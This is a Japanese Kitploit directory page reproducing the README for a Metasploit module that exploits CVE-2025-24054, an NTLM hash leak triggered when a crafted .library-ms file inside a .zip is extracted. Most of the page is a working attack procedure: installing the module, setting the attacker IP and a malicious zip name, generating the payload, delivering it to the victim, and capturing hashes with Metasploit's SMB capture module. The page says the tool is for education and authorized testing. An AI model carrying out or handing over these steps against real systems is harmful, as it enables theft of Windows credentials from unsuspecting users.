Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24054-24071---Metasploit-Module — CVE-2025-24054 (旧24071) を悪用するためのMetasploitモジュール。Windowsライブラリベースの攻撃ベクトル向けにMetasploitに統合されたNTLM漏洩エクスプロイト。 | Kitploit
ツール/GitHubGitHub/securitylayer404/cve-2025-24054-24071---metasploit-module
エクスプロイトフレームワークペイロード生成エクスプロイトペネトレーションテスト学習と教育レッドチーミング
GitHubsecuritylayer404/cve-2025-24054-24071---metasploit-module

CVE-2025-24054-24071---Metasploit-Module

CVE-2025-24054 (旧24071) を悪用するためのMetasploitモジュール。Windowsライブラリベースの攻撃ベクトル向けにMetasploitに統合されたNTLM漏洩エクスプロイト。

リポジトリを見る
15ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24054/24071 - Metasploit モジュール

概要

脆弱性は、.zip ファイルの抽出プロセス中に発生します。特別に細工された .library-ms ファイルと対話する際、Windows エクスプローラーは内部の XML スキーマを処理し、攻撃者が制御するリモートパスへの SMB 認証要求を自動的に開始します。

この動作により、ファイルの解凍以外の追加の操作を必要とせずに、ユーザーの NTLM ハッシュが流出する可能性があります。概念実証については、次のリンクを参照することをお勧めします: Fluffy - HTB。

⚠️ 重要な注意:

この脆弱性は元々 CVE-2025-24071 として公開されましたが、現在は正式に CVE-2025-24054 として追跡されています。

📌 インストール

リポジトリをクローンする:

root@kitploit:~
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071

モジュールを Metasploit ディレクトリにコピーする:

root@kitploit:~
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

ディレクトリが存在しない場合は、次のコマンドで作成する:

root@kitploit:~
❯ mkdir -p ~/.msf4/modules/auxiliary/server/

その後、再度モジュールをコピーする。

📌 使用方法

Metasploit を起動し、モジュールをロードする:

root@kitploit:~
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak

モジュールが正しくロードされると、設定オプションが表示されます:

root@kitploit:~
❯ show options

Module options (auxiliary/server/ntlm_hash_leak):

   Name          Current Setting       Required  Description

   ----          ---------------       --------  -----------

   ATTACKER_IP                         yes       IP del atacante (donde corre Responder/Impacket)

   FILENAME      exploit.zip           yes       El nombre del archivo ZIP

   LIBRARY_NAME  documents.library-ms  yes       Nombre del archivo .library-ms

   SHARE_NAME    recurso               yes       Nombre del recurso compartido ficticio

モジュールを設定して実行する:

root@kitploit:~
❯ set ATTACKER_IP 0.0.0.0  # Reemplaza con tu IP atacante

❯ set FILENAME exploit.zip  # Nombre del payload que subiras al SMB (equipo objetivo)

❯ set LIBRARY_NAME malicious.library-ms  # Nombre de .library-ms file

❯ set SHARE_NAME it_shared  # Nombre del recurso SMB

❯ run

出力: モジュールは .zip ファイルを生成し、それを対象の SMB サーバーにアップロードして、被害者側で実行させる必要があります。

root@kitploit:~
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed

最後に、Metasploit の SMB キャプチャモジュールを使用して NTLM ハッシュを受信します:

root@kitploit:~
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0  # Reemplaza con tu IP atacante
❯ run

Metasploit から SMB サーバーを起動する際に問題がある場合:

  • msfconsole を root として実行する
  • ntlm_hash_leak.rb ファイルが root からアクセスできる適切な権限を持っていることを確認する

⚠️ 警告

このモジュールは教育目的および許可されたテストのみを目的として開発されました。 この種のツールの無許可での使用は違法となる可能性があります。

🕷 作成者

Security Layer

ツールをダウンロード